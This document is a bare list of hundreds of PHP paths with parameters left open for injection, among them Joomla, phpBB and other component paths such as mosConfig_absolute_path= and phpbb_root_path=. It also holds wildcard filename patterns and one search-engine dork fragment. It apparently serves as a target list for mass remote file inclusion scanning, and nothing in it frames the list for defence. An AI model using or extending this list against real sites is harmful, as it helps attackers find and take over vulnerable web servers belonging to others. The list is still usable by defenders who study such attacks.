index.php?meio=&#13;
index.php?inc=&#13;
index.php?c=&#13;
index.php?arquivo=&#13;
components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=&#13;
index.php?show=&#13;
index.php?dept=&#13;
index.php?inhalt=&#13;
principal.php?conteudo=&#13;
main.php?site=&#13;
template.php?name=&#13;
forum.php?act=&#13;
index2.php?content=&#13;
index.phpmain.php?x=&#13;
index.php?canal=&#13;
services.php?page=&#13;
index.php?Language=&#13;
video.php?content=&#13;
pages.php?page=&#13;
print.php?page=&#13;
show.php?page=&#13;
media.php?page=&#13;
index2.php?ascii_seite=&#13;
index2.php?DoAction=&#13;
index1.php?site=&#13;
main.php?link=&#13;
home.php?x=&#13;
/phpopenchat/contrib/yabbse/poc.php?sourcedir=&#13;
/squito/photolist.inc.php?photoroot=&#13;
/spid/lang/lang.php?lang_path=&#13;
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=&#13;
/index.php?_REQUEST=&amp;_REQUEST[option]=com_content&amp;_REQUEST[Itemid]=1&amp;GLOBALS=&amp;mosConfig_absolute_path=&#13;
/app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=&#13;
components/com_performs/performs.php?mosConfig_absolute_path=&#13;
/components/com_smf/smf.php?mosConfig_absolute_path=&#13;
/components/com_cpg/cpg.php?mosConfig_absolute_path=&#13;
administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=&#13;
/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=&#13;
inc/cmses/aedating4CMS.php?dir[inc]= flashchat site:br bp_ncom.php?bnrep=&#13;
/jscript.php?my_ms[root]=&#13;
/popup_window.php?site_isp_root=&#13;
/surveys/survey.inc.php?path=&#13;
index.php?body=&#13;
enc/content.php?Home_Path=&#13;
/sources/functions.php?CONFIG[main_path]=&#13;
/embed/day.php?path=&#13;
/includes/dbal.php?eqdkp_root_path=&#13;
sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]=&#13;
/includes/kb_constants.php?module_root_path=&#13;
/components/com_facileforms/facileforms.frame.php?ff_compath=&#13;
skins/advanced/advanced1.php?pluginpath[0]=&#13;
/components/com_zoom/includes/database.php?mosConfig_absolute_path=&#13;
/main.php?sayfa=&#13;
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=&#13;
/addpost_newpoll.php?addpoll=preview&amp;thispath=&#13;
/header.php?abspath=&#13;
/modules/vwar/admin/admin.php?vwar_root=&#13;
/skin/zero_vote/error.php?dir=&#13;
/modules/TotalCalendar/about.php?inc_dir=&#13;
login.php?dir=&#13;
index.php?pageurl=&#13;
index.php?id=&#13;
content.php?page=&#13;
admin.php?page=&#13;
SQuery/lib/gore.php?libpath=&#13;
index2.php?p=&#13;
config.php?_CCFG[_PKG_PATH_DBSE]=&#13;
akocomments.php?mosConfig_absolute_path=&#13;
index.php?lang=gr&amp;file&#13;
index.php?pag=&#13;
index.php?incl=&#13;
avatar.php?page=&#13;
index.php?x= index.php?mode=index.php?stranica=&#13;
index.php?sub=index.php?id=index.php?t=&#13;
index.php?menu=&#13;
index0.php?show=&#13;
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /tools/send_reminders.php?includedir= day.php?date=&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /tags.php?BBCodeFile=&#13;
index.php?topic=&#13;
index.php?u=administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=&#13;
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=modules/My_eGery/index.php?basepath=&#13;
/modules/vwar/admin/admin.php?vwar_root=index.php?loc=&#13;
.br/index.php?loc=&#13;
myevent.php?myevent_path=&#13;
includes/functions.php?phpbb_root_path=&#13;
index.php?template=&#13;
search.php?cutepath=&#13;
administrator/components/com_webring/admin.webring.docs.php?component_dir=&#13;
help.php?css_path=&#13;
big.php?pathtotemplate=&#13;
includes/search.php?GlobalSettings[templatesDirectory]=&#13;
interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=&#13;
modules/My_eGery/index.php?basepath=&#13;
/includes/orderSuccess.inc.php?glob=1&amp;cart_order_id=1&amp;glob[rootDir]=&#13;
/class.mysql.php?path_to_bt_dir=&#13;
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=&#13;
/squirrelcart/cart_content.php?cart_isp_root=&#13;
/modules/Forums/admin/admin_styles.php?phpbb_root_path=&#13;
index.php?url=&#13;
index.php?openfile=&#13;
index.php?side=&#13;
index.php?doc=&#13;
index.php?principal=&#13;
index.php?rage=&#13;
index.php?place=&#13;
index.php?dsp=&#13;
index.php?lg=&#13;
index.php?pilih=&#13;
template.php?pagina=&#13;
contenido.php?sec=&#13;
index_principal.php?pagina=&#13;
home.php?pagina=&#13;
noticias.php?arq=&#13;
default.php?page=&#13;
index.php?meio.php=&#13;
index.php?screen=&#13;
index.php?langc=&#13;
htmltonuke.php?filnavn=&#13;
ihm.php?p=&#13;
folder.php?id=&#13;
index.php?Load=&#13;
h.php?file=&#13;
h.php?page=&#13;
template.php?goto=&#13;
index1.php?menu=&#13;
index.php?ort=&#13;
index2.php?ID=&#13;
index2.php?url_page=&#13;
index1.php?dat=&#13;
port.php?content=&#13;
index1.php?x=&#13;
/contrib/yabbse/poc.php?poc_root_path=&#13;
/photoalb/lib/static/header.php?set_menu=&#13;
/bz/squito/photolist.inc.php?photoroot=&#13;
/ppa/inc/functions.inc.php?config[ppa_root_path]=&#13;
al_initialize.php?alpath=&#13;
/extensions/moblog/moblog_lib.php?basedir=&#13;
modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]=&#13;
/components/com_rsgery/rsgery.html.php?mosConfig_absolute_path=&#13;
inc/cmses/aedating4CMS.php?dir[inc]=&#13;
bp_ncom.php?bnrep=&#13;
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=&#13;
/yabbse/Sources/Packages.php?sourcedir=&#13;
/include/main.php?config[search_disp]=true&amp;include_dir=&#13;
/includes/functions_portal.php?phpbb_root_path=&#13;
pagina.php?ir=&#13;
home.php?qry=&#13;
index3.php?url=&#13;
index1.php?action=&#13;
press.php?param=&#13;
view.php?adresa=&#13;
pagina.php?type=&#13;
file.php?ki=&#13;
gery.php?seite=&#13;
include.php?loader=&#13;
index2.php?module=&#13;
gery.php?strona=&#13;
general.php?itemnav=&#13;
template.php?h=&#13;
nota.php?header=&#13;
blank.php?ki=&#13;
enter.php?base_dir=&#13;
general.php?thispage=&#13;
view.php?var=&#13;
include.php?*&#13;
layout.php?pagina=&#13;
padrao.php?ir=&#13;
*inc*.php?left=&#13;
gery.php?eval=&#13;
index2.php?base_dir=&#13;
index1.php?op=&#13;
padrao.php?sivu=&#13;
enter.php?pagina=&#13;
principal.php?recipe=&#13;
file.php?pref=&#13;
standard.php?goto=&#13;
index2.php?phpbb_root_path=&#13;
path.php?action=&#13;
mod*.php?link=&#13;
include.php?nivel=&#13;
head.php?pollname=&#13;
default.php?name=&#13;
standard.php?param=&#13;
general.php?where=&#13;
head.php?*&#13;
principal.php?url=&#13;
home.php?ref=&#13;
down*.php?left=&#13;
standard.php?url=&#13;
press.php?*root*=&#13;
view.php?*&#13;
view.php?second=&#13;
include.php?loc=&#13;
template.php?second=&#13;
index.php?filepath=&#13;
home.php?pr=&#13;
index.php?module=&#13;
file.php?url=&#13;
home.php?itemnav=&#13;
default.php?read=&#13;
view.php?incl=&#13;
down*.php?to=&#13;
principal.php?viewpage=&#13;
index2.php?choix=&#13;
standard.php?seccion=&#13;
page.php?goto=&#13;
*.php?secc=&#13;
index3.php?chapter=&#13;
start.php?seccion=&#13;
base.php?middlePart=&#13;
template.php?panel=&#13;
path.php?menue=&#13;
padrao.php?secc=&#13;
*inc*.php?inc=&#13;
general.php?id=&#13;
standard.php?pref=&#13;
template.php?play=&#13;
layout.php?my=&#13;
padrao.php?seite=&#13;
press.php?i=&#13;
mod*.php?tipo=&#13;
gery.php?ref=&#13;
press.php?inc=&#13;
index2.php?left=&#13;
view.php?phpbb_root_path=&#13;
base.php?k=&#13;
index3.php?pag=&#13;
down*.php?OpenPage=&#13;
sitio.php?strona=&#13;
nota.php?seite=&#13;
index.php?basepath=&#13;
info.php?in=&#13;
start.php?where=&#13;
default.php?n=&#13;
down*.php?filepath=&#13;
main.php?corpo=&#13;
principal.php?filepath=&#13;
view.php?option=&#13;
show.php?*root*=&#13;
principal.php?pre=&#13;
start.php?p=&#13;
standard.php?home=&#13;
enter.php?numero=&#13;
index2.php?oldal=&#13;
general.php?addr=&#13;
general.php?tipo=&#13;
index.php?secao=&#13;
info.php?op=&#13;
template.php?page=&#13;
include.php?sivu=&#13;
index.php?modo=&#13;
show.php?module=&#13;
sitio.php?texto=&#13;
gery.php?oldal=&#13;
press.php?incl=&#13;
principal.php?w=&#13;
index2.php?pname=&#13;
path.php?path=&#13;
*inc*.php?category=&#13;
default.php?pag=&#13;
default.php?pr=&#13;
main.php?adresa=&#13;
default.php?to=&#13;
default.php?opcion=&#13;
main.php?str=&#13;
path.php?in=&#13;
base.php?ev=&#13;
principal.php?choix=&#13;
default.php?m=&#13;
include.php?name=&#13;
path.php?link=&#13;
view.php?pag=&#13;
principal.php?my=&#13;
index1.php?*&#13;
path.php?header=&#13;
*inc*.php?base_dir=&#13;
principal.php?basepath=&#13;
view.php?disp=&#13;
head.php?modo=&#13;
show.php?left=&#13;
gery.php?url=&#13;
sub*.php?*root*=&#13;
mod*.php?section=&#13;
general.php?name=&#13;
base.php?disp=&#13;
principal.php?module=&#13;
sub*.php?OpenPage=&#13;
gery.php?xlink=&#13;
mod*.php?to=&#13;
padrao.php?oldal=&#13;
sub*.php?lang=&#13;
down*.php?x=&#13;
enter.php?sp=&#13;
index2.php?loader=&#13;
enter.php?loader=&#13;
principal.php?disp=&#13;
sub*.php?viewpage=&#13;
template.php?pre=&#13;
mod*.php?goFile=&#13;
press.php?second=&#13;
base.php?seccion=&#13;
sitio.php?doshow=&#13;
*inc*.php?type=&#13;
show.php?filepath=&#13;
sitio.php?qry=&#13;
general.php?pr=&#13;
layout.php?panel=&#13;
pagina.php?go=&#13;
press.php?*&#13;
default.php?var=&#13;
sub*.php?corpo=&#13;
file.php?viewpage=&#13;
press.php?itemnav=&#13;
mod*.php?ev=&#13;
blank.php?OpenPage=&#13;
head.php?tipo=&#13;
sitio.php?sec=&#13;
default.php?cmd=&#13;
blank.php?channel=&#13;
mod*.php?j=&#13;
layout.php?modo=&#13;
head.php?pageweb=&#13;
path.php?type=&#13;
layout.php?g=&#13;
nota.php?base_dir=&#13;
index2.php?showpage=&#13;
index3.php?type=&#13;
base.php?cont=&#13;
mod*.php?chapter=&#13;
sitio.php?ev=&#13;
home.php?sekce=&#13;
sitio.php?sp=&#13;
nota.php?tipo=&#13;
view.php?to=&#13;
include.php?middle=&#13;
include.php?phpbb_root_path=&#13;
index2.php?include=&#13;
nota.php?itemnav=&#13;
include.php?option=&#13;
index2.php?type=&#13;
base.php?link=&#13;
path.php?chapter=&#13;
show.php?sp=&#13;
home.php?section=&#13;
default.php?y=&#13;
gery.php?*&#13;
pagina.php?link=&#13;
index1.php?o=&#13;
gery.php?addr=&#13;
*inc*.php?menu=&#13;
path.php?where=&#13;
pagina.php?home=&#13;
file.php?doshow=&#13;
index3.php?pname=&#13;
nota.php?in=&#13;
path.php?middlePart=&#13;
down*.php?sp=&#13;
page.php?module=&#13;
index3.php?ev=&#13;
standard.php?eval=&#13;
path.php?y=&#13;
template.php?qry=&#13;
start.php?option=&#13;
info.php?subject=&#13;
page.php?abre=&#13;
sub*.php?g=&#13;
home.php?g=&#13;
file.php?play=&#13;
start.php?loader=&#13;
start.php?showpage=&#13;
info.php?ref=&#13;
pagina.php?id=&#13;
blank.php?name=&#13;
head.php?str=&#13;
print.php?header=&#13;
index3.php?mid=&#13;
down*.php?disp=&#13;
blank.php?j=&#13;
path.php?goto=&#13;
default.php?type=&#13;
mod*.php?incl=&#13;
path.php?filepath=&#13;
gery.php?base_dir=&#13;
show.php?middlePart=&#13;
*inc*.php?to=&#13;
layout.php?z=&#13;
view.php?seccion=&#13;
sitio.php?*root*=&#13;
file.php?strona=&#13;
mod*.php?pag=&#13;
index2.php?ref=&#13;
head.php?sekce=&#13;
layout.php?pref=&#13;
path.php?doshow=&#13;
path.php?panel=&#13;
file.php?pagina=&#13;
index2.php?e=&#13;
path.php?sp=&#13;
pagina.php?load=&#13;
general.php?section=&#13;
base.php?filepath=&#13;
include.php?content=&#13;
blank.php?basepath=&#13;
template.php?ref=&#13;
head.php?load=&#13;
main.php?subject=&#13;
file.php?y=&#13;
down*.php?ev=&#13;
padrao.php?choix=&#13;
index.php?channel=&#13;
nota.php?t=&#13;
blank.php?panel=&#13;
sub*.php?header=&#13;
info.php?var=&#13;
enter.php?read=&#13;
head.php?adresa=&#13;
print.php?param=&#13;
default.php?sp=&#13;
start.php?panel=&#13;
template.php?dir=&#13;
show.php?pre=&#13;
view.php?content=&#13;
print.php?strona=&#13;
sitio.php?inc=&#13;
info.php?header=&#13;
info.php?itemnav=&#13;
file.php?to=&#13;
base.php?itemnav=&#13;
standard.php?where=&#13;
sitio.php?modo=&#13;
sitio.php?disp=&#13;
print.php?addr=&#13;
mod*.php?oldal=&#13;
sub*.php?go=&#13;
start.php?load=&#13;
index2.php?option=&#13;
blank.php?mod=&#13;
index3.php?inc=&#13;
standard.php?my=&#13;
enter.php?y=&#13;
base.php?pageweb=&#13;
padrao.php?*root*=&#13;
main.php?action=&#13;
pagina.php?path=&#13;
sub*.php?phpbb_root_path=&#13;
path.php?home=&#13;
index3.php?middle=&#13;
index3.php?get=&#13;
default.php?seccion=&#13;
print.php?numero=&#13;
include.php?in=&#13;
include.php?secao=&#13;
sub*.php?sec=&#13;
home.php?channel=&#13;
base.php?body=&#13;
enter.php?ir=&#13;
home.php?oldal=&#13;
head.php?pag=&#13;
general.php?menu=&#13;
nota.php?seccion=&#13;
path.php?xlink=&#13;
page.php?mid=&#13;
index1.php?link=&#13;
blank.php?sp=&#13;
default.php?panel=&#13;
*inc*.php?doshow=&#13;
blank.php?id=&#13;
print.php?read=&#13;
sitio.php?destino=&#13;
principal.php?d=&#13;
start.php?name=&#13;
default.php?chapter=&#13;
head.php?goto=&#13;
path.php?qry=&#13;
default.php?*root*=&#13;
enter.php?cmd=&#13;
file.php?include=&#13;
enter.php?body=&#13;
index.php?chapter=&#13;
include.php?panel=&#13;
default.php?choix=&#13;
start.php?oldal=&#13;
down*.php?ir=&#13;
nota.php?module=&#13;
info.php?xlink=&#13;
enter.php?lang=&#13;
general.php?redirect=&#13;
view.php?recipe=&#13;
home.php?ir=&#13;
padrao.php?open=&#13;
base.php?subject=&#13;
padrao.php?u=&#13;
sub*.php?my=&#13;
enter.php?type=&#13;
blank.php?ir=&#13;
page.php?showpage=&#13;
home.php?disp=&#13;
index3.php?secc=&#13;
home.php?panel=&#13;
index1.php?pr=&#13;
main.php?ref=&#13;
layout.php?link=&#13;
standard.php?qry=&#13;
index2.php?thispage=&#13;
index3.php?pollname=&#13;
pagina.php?cmd=&#13;
view.php?body=&#13;
head.php?rub=&#13;
standard.php?include=&#13;
path.php?secao=&#13;
press.php?opcion=&#13;
gery.php?tipo=&#13;
index1.php?v=&#13;
pagina.php?secao=&#13;
standard.php?secc=&#13;
gery.php?loader=&#13;
index3.php?include=&#13;
pagina.php?to=&#13;
enter.php?strona=&#13;
sub*.php?s=&#13;
enter.php?get=&#13;
path.php?var=&#13;
general.php?subject=&#13;
enter.php?pa=&#13;
include.php?header=&#13;
include.php?mid=&#13;
blank.php?incl=&#13;
index2.php?corpo=&#13;
index1.php?incl=&#13;
home.php?choix=&#13;
index1.php?c=&#13;
index2.php?var=&#13;
main.php?pref=&#13;
index1.php?pname=&#13;
path.php?incl=&#13;
info.php?recipe=&#13;
view.php?sec=&#13;
file.php?where=&#13;
print.php?name=&#13;
info.php?c=&#13;
principal.php?cont=&#13;
print.php?menue=&#13;
info.php?f=&#13;
padrao.php?xlink=&#13;
index1.php?url=&#13;
gery.php?basepath=&#13;
template.php?mid=&#13;
sub*.php?id=&#13;
start.php?corpo=&#13;
file.php?chapter=&#13;
home.php?chapter=&#13;
standard.php?chapter=&#13;
press.php?page=&#13;
nota.php?n=&#13;
start.php?adresa=&#13;
default.php?e=&#13;
sub*.php?itemnav=&#13;
standard.php?go=&#13;
sitio.php?menu=&#13;
press.php?goFile=&#13;
principal.php?id=&#13;
down*.php?incl=&#13;
principal.php?z=&#13;
main.php?my=&#13;
start.php?ir=&#13;
info.php?ki=&#13;
file.php?loader=&#13;
index.php?mid=&#13;
down*.php?seite=&#13;
base.php?lang=&#13;
nota.php?inc=&#13;
standard.php?index=&#13;
index1.php?var=&#13;
principal.php?p=&#13;
pagina.php?index=&#13;
view.php?qry=&#13;
home.php?tipo=&#13;
page.php?numero=&#13;
index1.php?strona=&#13;
show.php?inc=&#13;
index2.php?redirect=&#13;
pagina.php?middlePart=&#13;
template.php?base_dir=&#13;
info.php?mid=&#13;
home.php?module=&#13;
general.php?left=&#13;
print.php?doshow=&#13;
general.php?page=&#13;
path.php?adresa=&#13;
page.php?seite=&#13;
home.php?menu=&#13;
index2.php?open=&#13;
blank.php?pname=&#13;
sub*.php?modo=&#13;
index2.php?goto=&#13;
path.php?subject=&#13;
general.php?sivu=&#13;
general.php?read=&#13;
principal.php?ev=&#13;
press.php?to=&#13;
main.php?middle=&#13;
print.php?pollname=&#13;
index2.php?strona=&#13;
template.php?f=&#13;
template.php?e=&#13;
press.php?pagina=&#13;
print.php?ki=&#13;
page.php?z=&#13;
enter.php?left=&#13;
head.php?middlePart=&#13;
gery.php?ev=&#13;
index3.php?ref=&#13;
file.php?id=&#13;
print.php?loc=&#13;
sitio.php?body=&#13;
pagina.php?n=&#13;
down*.php?s=&#13;
padrao.php?a=&#13;
page.php?OpenPage=&#13;
gery.php?option=&#13;
mod*.php?sekce=&#13;
template.php?thispage=&#13;
head.php?viewpage=&#13;
file.php?incl=&#13;
sitio.php?e=&#13;
page.php?cont=&#13;
sub*.php?adresa=&#13;
index2.php?pg=&#13;
layout.php?thispage=&#13;
padrao.php?body=&#13;
base.php?t=&#13;
press.php?redirect=&#13;
pagina.php?seccion=&#13;
layout.php?action=&#13;
sitio.php?option=&#13;
index2.php?category=&#13;
pagina.php?lang=&#13;
include.php?ref=&#13;
index3.php?thispage=&#13;
sub*.php?seite=&#13;
layout.php?addr=&#13;
nota.php?mid=&#13;
page.php?p=&#13;
mod*.php?corpo=&#13;
press.php?t=&#13;
blank.php?category=&#13;
*inc*.php?y=&#13;
nota.php?category=&#13;
show.php?d=&#13;
enter.php?menue=&#13;
index1.php?t=&#13;
nota.php?adresa=&#13;
main.php?thispage=&#13;
layout.php?tipo=&#13;
index3.php?d=&#13;
enter.php?b=&#13;
main.php?loc=&#13;
standard.php?z=&#13;
show.php?base_dir=&#13;
sitio.php?middlePart=&#13;
template.php?a=&#13;
page.php?read=&#13;
index.php?param=&#13;
default.php?channel=&#13;
sub*.php?link=&#13;
padrao.php?texto=&#13;
base.php?base_dir=&#13;
file.php?texto=&#13;
base.php?middle=&#13;
pagina.php?base_dir=&#13;
print.php?tipo=&#13;
principal.php?pag=&#13;
index2.php?loc=&#13;
nota.php?option=&#13;
home.php?index=&#13;
print.php?base_dir=&#13;
file.php?get=&#13;
info.php?content=&#13;
default.php?goto=&#13;
start.php?include=&#13;
print.php?option=&#13;
default.php?v=&#13;
base.php?numero=&#13;
index2.php?qry=&#13;
sub*.php?secao=&#13;
sub*.php?secc=&#13;
mod*.php?lang=&#13;
standard.php?pollname=&#13;
default.php?load=&#13;
show.php?j=&#13;
down*.php?pa=&#13;
standard.php?open=&#13;
file.php?disp=&#13;
press.php?xlink=&#13;
print.php?s=&#13;
mod*.php?secc=&#13;
index1.php?param=&#13;
index3.php?sivu=&#13;
mod*.php?pg=&#13;
layout.php?cmd=&#13;
info.php?phpbb_root_path=&#13;
print.php?OpenPage=&#13;
default.php?thispage=&#13;
enter.php?sec=&#13;
path.php?*&#13;
home.php?middlePart=&#13;
index3.php?channel=&#13;
template.php?sekce=&#13;
down*.php?goFile=&#13;
blank.php?header=&#13;
start.php?body=&#13;
base.php?module=&#13;
default.php?l=&#13;
index2.php?texto=&#13;
home.php?eval=&#13;
padrao.php?section=&#13;
blank.php?goFile=&#13;
index.php?index=&#13;
layout.php?ir=&#13;
blank.php?pollname=&#13;
include.php?x=&#13;
start.php?pageweb=&#13;
gery.php?rub=&#13;
template.php?sp=&#13;
sub*.php?basepath=&#13;
standard.php?section=&#13;
enter.php?abre=&#13;
index1.php?pa=&#13;
principal.php?seite=&#13;
gery.php?chapter=&#13;
nota.php?qry=&#13;
pagina.php?pagina=&#13;
default.php?menu=&#13;
standard.php?*&#13;
default.php?abre=&#13;
press.php?pg=&#13;
start.php?nivel=&#13;
index1.php?filepath=&#13;
padrao.php?op=&#13;
mod*.php?pre=&#13;
default.php?pa=&#13;
press.php?strona=&#13;
nota.php?cmd=&#13;
standard.php?abre=&#13;
general.php?seccion=&#13;
index1.php?itemnav=&#13;
layout.php?seite=&#13;
home.php?pollname=&#13;
path.php?left=&#13;
down*.php?inc=&#13;
include.php?channel=&#13;
print.php?dir=&#13;
main.php?disp=&#13;
print.php?pre=&#13;
padrao.php?cont=&#13;
padrao.php?menu=&#13;
path.php?addr=&#13;
base.php?sekce=&#13;
pagina.php?loader=&#13;
page.php?go=&#13;
press.php?category=&#13;
gery.php?left=&#13;
down*.php?qry=&#13;
file.php?second=&#13;
include.php?pag=&#13;
base.php?ir=&#13;
template.php?addr=&#13;
sitio.php?nivel=&#13;
include.php?destino=&#13;
head.php?disp=&#13;
general.php?w=&#13;
gery.php?sec=&#13;
base.php?var=&#13;
enter.php?addr=&#13;
enter.php?go=&#13;
page.php?middle=&#13;
start.php?home=&#13;
info.php?rub=&#13;
pagina.php?OpenPage=&#13;
head.php?content=&#13;
principal.php?pref=&#13;
home.php?in=&#13;
path.php?disp=&#13;
main.php?index=&#13;
file.php?eval=&#13;
press.php?base_dir=&#13;
main.php?content=&#13;
show.php?disp=&#13;
index.php?opcion=&#13;
view.php?loader=&#13;
down*.php?strona=&#13;
principal.php?seccion=&#13;
principal.php?n=&#13;
blank.php?link=&#13;
file.php?sivu=&#13;
info.php?adresa=&#13;
*inc*.php?ki=&#13;
padrao.php?incl=&#13;
main.php?eval=&#13;
gery.php?nivel=&#13;
sub*.php?goFile=&#13;
info.php?sec=&#13;
main.php?include=&#13;
main.php?page=&#13;
base.php?*&#13;
home.php?rub=&#13;
default.php?k=&#13;
index3.php?t=&#13;
file.php?showpage=&#13;
enter.php?home=&#13;
info.php?menue=&#13;
index.php?middlePart=&#13;
blank.php?corpo=&#13;
press.php?where=&#13;
path.php?p=&#13;
page.php?*&#13;
enter.php?path=&#13;
press.php?ir=&#13;
index1.php?path=&#13;
sub*.php?option=&#13;
sub*.php?pag=&#13;
layout.php?where=&#13;
info.php?o=&#13;
file.php?oldal=&#13;
template.php?menue=&#13;
press.php?abre=&#13;
layout.php?OpenPage=&#13;
home.php?play=&#13;
sitio.php?pg=&#13;
main.php?filepath=&#13;
general.php?to=&#13;
index1.php?*root*=&#13;
show.php?qry=&#13;
print.php?where=&#13;
index2.php?itemnav=&#13;
pagina.php?q=&#13;
enter.php?str=&#13;
enter.php?name=&#13;
sitio.php?addr=&#13;
enter.php?incl=&#13;
index3.php?mod=&#13;
template.php?opcion=&#13;
nota.php?pre=&#13;
head.php?lang=&#13;
pagina.php?g=&#13;
include.php?tipo=&#13;
default.php?loc=&#13;
principal.php?destino=&#13;
index3.php?menue=&#13;
index.php?y=&#13;
home.php?opcion=&#13;
print.php?middlePart=&#13;
sitio.php?secc=&#13;
show.php?read=&#13;
standard.php?var=&#13;
info.php?param=&#13;
head.php?start=&#13;
view.php?oldal=&#13;
mod*.php?play=&#13;
gery.php?h=&#13;
pagina.php?mid=&#13;
sub*.php?thispage=&#13;
layout.php?loader=&#13;
enter.php?qry=&#13;
padrao.php?filepath=&#13;
include.php?ir=&#13;
sub*.php?u=&#13;
base.php?chapter=&#13;
press.php?pageweb=&#13;
sub*.php?pa=&#13;
enter.php?texto=&#13;
home.php?link=&#13;
template.php?*&#13;
gery.php?action=&#13;
base.php?oldal=&#13;
index3.php?dir=&#13;
include.php?ki=&#13;
index3.php?body=&#13;
standard.php?oldal=&#13;
nota.php?showpage=&#13;
general.php?f=&#13;
padrao.php?pag=&#13;
*inc*.php?rub=&#13;
index2.php?adresa=&#13;
head.php?sec=&#13;
nota.php?filepath=&#13;
print.php?link=&#13;
gery.php?pname=&#13;
show.php?pname=&#13;
base.php?loc=&#13;
file.php?q=&#13;
gery.php?sivu=&#13;
padrao.php?header=&#13;
layout.php?abre=&#13;
index3.php?pref=&#13;
enter.php?subject=&#13;
page.php?modo=&#13;
page.php?left=&#13;
base.php?abre=&#13;
index3.php?addr=&#13;
blank.php?pr=&#13;
*inc*.php?get=&#13;
print.php?play=&#13;
padrao.php?secao=&#13;
index.php?str=&#13;
general.php?sekce=&#13;
show.php?m=&#13;
head.php?b=&#13;
index1.php?mod=&#13;
home.php?showpage=&#13;
home.php?cmd=&#13;
index1.php?read=&#13;
page.php?load=&#13;
general.php?choix=&#13;
home.php?my=&#13;
start.php?param=&#13;
layout.php?sekce=&#13;
enter.php?module=&#13;
mod*.php?secao=&#13;
show.php?n=&#13;
start.php?pname=&#13;
down*.php?doshow=&#13;
index2.php?pre=&#13;
layout.php?nivel=&#13;
home.php?base_dir=&#13;
include.php?eval=&#13;
standard.php?xlink=&#13;
info.php?home=&#13;
general.php?body=&#13;
head.php?play=&#13;
file.php?index=&#13;
mod*.php?OpenPage=&#13;
index.php?b=&#13;
principal.php?ki=&#13;
sub*.php?panel=&#13;
path.php?sec=&#13;
nota.php?left=&#13;
default.php?header=&#13;
padrao.php?qry=&#13;
file.php?corpo=&#13;
padrao.php?strona=&#13;
sub*.php?z=&#13;
pagina.php?include=&#13;
page.php?link=&#13;
start.php?abre=&#13;
print.php?goFile=&#13;
*inc*.php?c=&#13;
down*.php?cmd=&#13;
home.php?middle=&#13;
sub*.php?open=&#13;
include.php?second=&#13;
sitio.php?menue=&#13;
path.php?tipo=&#13;
home.php?addr=&#13;
gery.php?pref=&#13;
pagina.php?k=&#13;
head.php?strona=&#13;
general.php?e=&#13;
blank.php?get=&#13;
blank.php?sivu=&#13;
sitio.php?read=&#13;
home.php?thispage=&#13;
pagina.php?loc=&#13;
layout.php?qry=&#13;
print.php?*root*=&#13;
show.php?to=&#13;
view.php?u=&#13;
view.php?chapter=&#13;
principal.php?nivel=&#13;
info.php?secao=&#13;
nota.php?abre=&#13;
standard.php?menu=&#13;
index2.php?pollname=&#13;
index3.php?path=&#13;
index.php?base_dir=&#13;
general.php?secao=&#13;
mod*.php?home=&#13;
down*.php?section=&#13;
default.php?index=&#13;
general.php?doshow=&#13;
padrao.php?abre=&#13;
enter.php?seite=&#13;
down*.php?lang=&#13;
main.php?xlink=&#13;
index3.php?base_dir=&#13;
gery.php?redirect=&#13;
layout.php?basepath=&#13;
pagina.php?modo=&#13;
index.php?adresa=&#13;
down*.php?u=&#13;
main.php?mod=&#13;
file.php?start=&#13;
view.php?redirect=&#13;
index2.php?u=&#13;
padrao.php?*&#13;
info.php?ev=&#13;
index1.php?nivel=&#13;
include.php?seccion=&#13;
view.php?lang=&#13;
mod*.php?include=&#13;
mod*.php?seccion=&#13;
principal.php?pollname=&#13;
include.php?read=&#13;
press.php?rub=&#13;
index2.php?incl=&#13;
pagina.php?chapter=&#13;
view.php?middle=&#13;
print.php?sekce=&#13;
padrao.php?pname=&#13;
head.php?ref=&#13;
principal.php?link=&#13;
gery.php?menue=&#13;
template.php?op=&#13;
info.php?doshow=&#13;
default.php?sivu=&#13;
nota.php?pagina=&#13;
sitio.php?content=&#13;
press.php?thispage=&#13;
press.php?pa=&#13;
index1.php?redirect=&#13;
padrao.php?menue=&#13;
index2.php?sekce=&#13;
mod*.php?d=&#13;
include.php?filepath=&#13;
principal.php?l=&#13;
layout.php?oldal=&#13;
include.php?b=&#13;
layout.php?pollname=&#13;
start.php?play=&#13;
print.php?r=&#13;
info.php?*&#13;
sub*.php?*&#13;
* *=&#13;
mod*.php?addr=&#13;
base.php?category=&#13;
index2.php?d=&#13;
mod*.php?phpbb_root_path=&#13;
default.php?include=&#13;
press.php?module=&#13;
default.php?module=&#13;
info.php?pname=&#13;
path.php?id=&#13;
general.php?get=&#13;
press.php?path=&#13;
padrao.php?sekce=&#13;
base.php?ki=&#13;
file.php?cmd=&#13;
layout.php?section=&#13;
press.php?include=&#13;
mod*.php?destino=&#13;
base.php?doshow=&#13;
principal.php?load=&#13;
print.php?type=&#13;
index1.php?adresa=&#13;
index3.php?pre=&#13;
standard.php?cont=&#13;
gery.php?open=&#13;
blank.php?read=&#13;
sitio.php?redirect=&#13;
index1.php?cmd=&#13;
info.php?redirect=&#13;
file.php?load=&#13;
index3.php?itemnav=&#13;
gery.php?mod=&#13;
enter.php?ref=&#13;
down*.php?t=&#13;
view.php?goFile=&#13;
file.php?var=&#13;
sitio.php?ir=&#13;
show.php?b=&#13;
sitio.php?param=&#13;
sub*.php?rub=&#13;
print.php?opcion=&#13;
press.php?middle=&#13;
info.php?ir=&#13;
home.php?basepath=&#13;
blank.php?section=&#13;
include.php?to=&#13;
start.php?sp=&#13;
index3.php?name=&#13;
template.php?showpage=&#13;
view.php?ki=&#13;
index1.php?sekce=&#13;
press.php?option=&#13;
nota.php?home=&#13;
gery.php?my=&#13;
show.php?mid=&#13;
